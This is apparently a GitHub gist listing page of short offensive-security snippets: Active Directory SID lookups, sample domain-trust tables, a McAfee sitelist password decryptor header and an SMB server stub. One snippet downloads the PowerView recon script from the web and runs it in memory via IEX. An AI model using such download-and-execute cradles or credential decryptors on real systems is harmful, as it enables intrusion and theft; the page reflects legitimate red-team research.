HarmJ0y
/ gist:57f1dac93fcc3564f9b3
Created
October 23, 2014 13:53
domain user to sid and sid to user
View gist:57f1dac93fcc3564f9b3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # user to SID | |
| (New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value | |
| # SID to user | |
| (New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value |
View trusts.csv
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SourceDomain | TargetDomain | TrustType | TrustDirection | |
|---|---|---|---|---|
| finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
| mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
| mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
| mothership.com | engineering.mothership.com | ParentChild | Bidirectional | |
| corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
| corp.mothership.com | subsidiary.com | External | Inbound | |
| finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
| engineering.mothership.com | mothership.com | ParentChild | Bidirectional | |
| subsidiary.com | product.subsidiary.com | ParentChild | Bidirectional |
View trusts_complex.csv
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SourceDomain | TargetDomain | TrustType | TrustDirection | |
|---|---|---|---|---|
| finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
| mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
| mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
| mothership.com | contracts.mothership.com | ParentChild | Bidirectional | |
| corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
| contracts.mothership.com | mothership.com | ParentChild | Bidirectional | |
| contracts.mothership.com | product.othercompany.com | External | Inbound | |
| product.othercompany.com | contracts.mothership.com | External | Outbound | |
| product.othercompany.com | othercompany.com | ParentChild | Bidirectional |
View gist:0f847818b14f745b474d
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am harmj0y on github. | |
| * I am harmj0y (https://keybase.io/harmj0y) on keybase. | |
| * I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3 | |
| To claim this, I am signing this object: |
View Translate-Canonical.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Translate-Canonical { | |
| <# | |
| .SYNOPSIS | |
| Converts a user@fqdn to NT4 format. | |
| .LINK | |
| http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats | |
| #> | |
| [CmdletBinding()] | |
| param( | |
| [String]$User |
HarmJ0y
/ Get-DecryptedSitelistPassword.ps1
Created
February 12, 2016 03:05
Get-DecryptedSitelistPassword.ps1
View Get-DecryptedSitelistPassword.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DecryptedSitelistPassword { | |
| # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ | |
| # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com) | |
| # port by @harmj0y | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory = $True)] | |
| [String] | |
| $B64Pass | |
| ) |
View smb_hoster.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smbserver | |
| import sys, argparse, threading, ConfigParser, time, os | |
| class ThreadedSMBServer(threading.Thread): | |
| """ | |
| Threaded SMB server that can be spun up locally. | |
| """ |
View EncryptedStoreTests.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $RSA = New-RSAKeyPair | |
| # local tests | |
| $ComputerName = 'localhost' | |
| $StorePath = 'C:\Temp\temp.bin' | |
| Write-Host "`n[$ComputerName] AES Storepath : $StorePath" | |
| ".\secret.txt" | Write-EncryptedStore -StorePath $StorePath -Key 'Password123!' | |
| Read-EncryptedStore -StorePath $StorePath -Key 'Password123!' -List | |
| Get-EncryptedStoreData -StorePath $StorePath | Remove-EncryptedStore |
View anon.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $GroupData = @{} | |
| $UserData = @{} | |
| $ServerData = @{} | |
| Import-CSV .\DomainGroups.csv | ForEach-Object { | |
| if($GroupData[$_.GroupName]) { | |
| $_.GroupName = $GroupData[$_.GroupName] | |
| } | |
| else { | |
| $guid = ([guid]::NewGuid()).Guid |
View DPAPI.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -AssemblyName System.Security | |
| $Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1') | |
| $Bytes = ([Text.Encoding]::ASCII).GetBytes($Content) | |
| $EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine) | |
| IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine))) |
OlderNewer